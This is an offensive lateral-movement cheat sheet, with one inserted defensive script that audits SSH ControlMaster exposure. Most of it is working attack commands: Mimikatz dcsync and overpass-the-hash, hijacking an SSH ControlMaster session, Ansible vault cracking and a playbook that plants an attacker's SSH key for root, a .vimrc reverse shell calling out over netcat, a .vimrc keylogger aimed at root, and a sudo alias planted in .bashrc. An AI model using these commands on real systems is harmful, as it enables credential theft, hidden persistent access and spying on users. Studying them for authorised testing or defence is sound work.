Lateral Movement
Move to other users inside the machine, and don't sit in one rabbit hole for too long.
Check Active Network Connections
Look for hidden networks or listening ports that point to other reachable hosts.
# Windows (the Windows netstat has no -t/-p flags without a protocol argument)
netstat -ano
# Linux
netstat -tulpn
Types of Lateral Movement:
Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, and MFA bypass for access to Windows
Land on the system via phishing
Mimikatz to bypass MFA: use dcsync
lsadump::dcsync /user:<current user>
# take the HASH from [Primary:Kerberos-Newer-Keys *] --> [Credentials] --> [aes256_hmac]
# overpass the hash
sekurlsa::pth /user:<current user> /domain:<domain> /aes256:<HASH>
# a cmd window opens running as that user; from it, access the other computer
Enter-PSSession -ComputerName <other computer>
# ref: https://www.youtube.com/watch?v=Fmbp34dBuMc
Linux Lateral Movement with ControlMaster
ControlMaster is an SSH feature that shares multiple SSH sessions over a single network connection. We have to wait for the user to connect through the ControlMaster socket and then hijack the session.
Check the current compromised Linux machine:
cat ~/.ssh/config
# it looks like this
Host *
    ControlPath ~/.ssh/controlmaster/%r@%h:%p
    ControlMaster auto
    ControlPersist yes    # or no
Watch for a user's session logging on in the folder ~/.ssh/controlmaster/:
watch -d -n1 'ls -la ~/.ssh/controlmaster/'
A new socket file comes up like this:
# srw------- 1 <user> <user> 0 Jan 1 <time> user@host:port
Hijack it with this command on the current machine:
ssh -p port user@host
# with ControlMaster auto, the matching ControlPath socket is reused automatically
# or point at the socket explicitly with -S
ssh -S ~/.ssh/controlmaster/user\@host\:port user@host
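A defender-side audit of the ControlMaster exposure described above, added here as an example (it is not code from this cheat sheet or from its referenced source): it parses an ssh_config, reports hosts whose open session socket any process running as that user can reuse, and lists live control sockets in the ControlPath directory. SAMPLE_CONFIG is a constructed sample mirroring the config shown above; ~/.ssh/controlmaster is the socket directory used on this page.

```python
"""Added defender-side audit (not the cheat sheet's code) for the ControlMaster
hijack risk above: flag shareable SSH sessions and list live control sockets."""
import stat
from pathlib import Path

# Constructed sample mirroring the ~/.ssh/config shape shown on the page.
SAMPLE_CONFIG = """\
Host *
    ControlPath ~/.ssh/controlmaster/%r@%h:%p
    ControlMaster auto
    ControlPersist yes
"""

def parse_ssh_config(text):
    """Return {host_pattern: {option: value}} with option keywords lower-cased."""
    blocks, current = {}, "*"
    for raw in text.splitlines():
        parts = raw.split("#", 1)[0].replace("=", " ", 1).split(None, 1)
        if not parts:
            continue
        key, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        current = value if key == "host" else current
        blocks.setdefault(current, {}).update({} if key == "host" else {key: value})
    return blocks

def audit_ssh_config(text):
    """Return [(host, finding)] for blocks whose open-session socket is reusable."""
    findings = []
    for host, opts in parse_ssh_config(text).items():
        master = opts.get("controlmaster", "no").lower()
        if master == "no":  # ssh default: no multiplexing, nothing to hijack
            continue
        findings.append((host, f"ControlMaster {master}: any process running as this "
                               "user can reuse the open session through its socket"))
        persist = opts.get("controlpersist", "no").lower()
        if persist != "no":  # 'yes', '0' and idle timeouts all keep the socket alive
            findings.append((host, f"ControlPersist {persist}: socket outlives the session"))
    return findings

def find_control_sockets(directory):
    """(socket name, group/other accessible?) for each unix socket in a ControlPath dir."""
    return sorted((p.name, bool(p.lstat().st_mode & 0o077))
                  for p in Path(directory).iterdir() if stat.S_ISSOCK(p.lstat().st_mode))

if __name__ == "__main__":
    cfg = Path("~/.ssh/config").expanduser()
    for host, finding in audit_ssh_config(cfg.read_text() if cfg.is_file() else SAMPLE_CONFIG):
        print(f"[{host}] {finding}")
    sock_dir = Path("~/.ssh/controlmaster").expanduser()
    print(find_control_sockets(sock_dir) if sock_dir.is_dir() else "no control socket dir")
```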
Ansible
The user that runs Ansible is commonly a high-privilege account.
The controller server must have /etc/ansible/hosts, or check for an ansible user on the server:
grep ansible /etc/passwd
Command
ansible <target machine> -a "whoami"
# ansibleadm
ansible <target machine> -a "whoami" --become
# root
# with --become you act as root on the target, which is what backdooring root relies on
Playbook directory
/opt/playbooks
Code execution on the target computer with a playbook:
# rce.yml
- name: get rce
  hosts: all
  gather_facts: true
  tasks:
    - name: display remote code exec
      debug:
        msg: "hostname: {{ ansible_hostname }} and os: {{ ansible_distribution }}"
Run it with this command:
ansible-playbook rce.yml
YAML files sometimes contain passwords in plain text, or vault-encrypted ones. An encrypted value looks like:
$ANSIBLE_VAULT;1.1;AES256....
ansible2john.py ./test.yml > crackhash.txt
hashcat crackhash.txt --force --hash-type=16900 /usr/share/wordlists/rockyou.txt
Copy the vault blob to a compromised machine that has ansible-vault installed, save it as password.hash, and decrypt it:
cat password.hash | ansible-vault decrypt
# enter the password cracked with hashcat
Able to write the playbook.yaml?
Add this to the playbook.yaml to make a backdoor:
<snip>
  become: yes
  tasks:
    <snip>
    - name: make dir
      file:
        path: /root/.ssh
        state: directory
        mode: '0700'
        owner: root
        group: root
    - name: build authorized key
      file:
        path: /root/.ssh/authorized_keys
        state: touch
        mode: '0600'
        owner: root
        group: root
    - name: inject ssh key
      lineinfile:
        path: /root/.ssh/authorized_keys
        line: "<ssh public key attacker>"
        insertafter: EOF
RCE
    - name: RCE
      shell: ping 10.10.x.y
      async: 10
      poll: 0
VIM Backdoor
Option 1
create ~/.vimrc containing a shell escape (!<command>), e.g.:
:silent !nc 192.168.x.x 443 -e /bin/bash
Option 2
create ~/.vimrc
:silent !source /tmp/.vimrunscript
.vimrunscript contains the bash script:
#!/bin/bash
<command>
echo 'alias sudo="sudo -E"' >> .bashrc
# makes sudo keep the caller's environment
VIM Keylogger
create ~/.vimrc with:
:autocmd BufWritePost * :silent :w! >>/tmp/keyLogFromVim.txt
or this more advanced payload:
~/.vimrc
:if $USER == "root"
:autocmd BufWritePost * :silent :w! >>/tmp/keyLogFromVim.txt
:endif
reference:
https://highon.coffee/blog/ssh-lateral-movement-cheat-sheet/